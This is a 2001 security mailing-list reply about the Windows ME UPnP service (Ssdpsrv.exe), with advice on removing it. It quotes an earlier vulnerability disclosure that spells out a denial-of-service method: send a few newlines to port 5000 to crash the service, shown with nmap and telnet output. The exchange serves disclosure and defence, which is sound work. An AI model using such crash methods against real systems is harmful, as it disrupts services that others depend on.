Re: Ssdpsrv.exe in WindowsMEFrom: Alan Wright (AlanJWright@manx.net)
- Previous message: Robert Buel: "RE: Recommendation for a "secure" mail server"
- Next in thread: 'ken'@FTU: "Re: Ssdpsrv.exe in WindowsME"
- Reply: 'ken'@FTU: "Re: Ssdpsrv.exe in WindowsME"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Message-Id: <firstname.lastname@example.org> Date: Thu, 18 Oct 2001 23:25:00 +0100 To: "milo omega" <email@example.com> From: Alan Wright <AlanJWright@manx.net> Subject: Re: Ssdpsrv.exe in WindowsME
This is a cross post out of general interest to security basics.
Firstly you have to wonder why someone is running this service.
I personally only found out after using a ports traffic analyzer. I will
pass the url for the program on if you want it but do not want to be seen
to plug if against the rules of the forum. :-)
Secondly Windows Millenium installs the service without telling you that it
has done so when you do a basic install.
Remove it using Control Panel, Add/Remove progs ,windows setup.
communications, ckick on Universal plug and pray, (sic) and then apply.
At 19:46 17/10/2001 -0500, you wrote:
>By connecting to a computer running Ssdpsrv you are able to crash the
>Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
>This service comes standard with the WindowsME installation.
>The Ssdpsrv.exe server is started at boot.
>Here is the registry entry:
>Here is the file that starts the server:
>For information about UPnP go here:
>Upon running a scan on a computer running the server I get the following:
> bash-2.05$ nmap -sT 18.104.22.168
> Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
> Interesting ports on user-2injqmp.dialup.mindspring.com (22.214.171.124):
> (The 1547 ports scanned but not shown below are in state: closed)
> Port State Service
> 139/tcp open netbios-ssn
> 5000/tcp open fics
> Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
>Method to crash Ssdpsrv:
> Connect to the computer on port 5000.
> Send 3 to 5 newline characters.
> You then get an error and are disconnected.
> bash-2.05$ telnet 126.96.36.199 5000
> Trying 188.8.131.52...
> Connected to 184.108.40.206.
> Escape character is '^]'.
> HTTP/1.1 400 Bad Request
> Connection closed by foreign host.
>Here is the error caused by the crash:
> Ssdpsrv has caused an error in MSVCRT.DLL.
> Ssdpsrv will now close.
> If you continue to experience problems,
> try restarting your computer.
>This causes the server crash and closes port 5000.
>Either you must restart the server by manually running ssdpsrv.exe
>shouts to pulltheplug #c.
>Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
All the best
'You're a feisty little one but you'll soon learn respect'
Return of the Jedi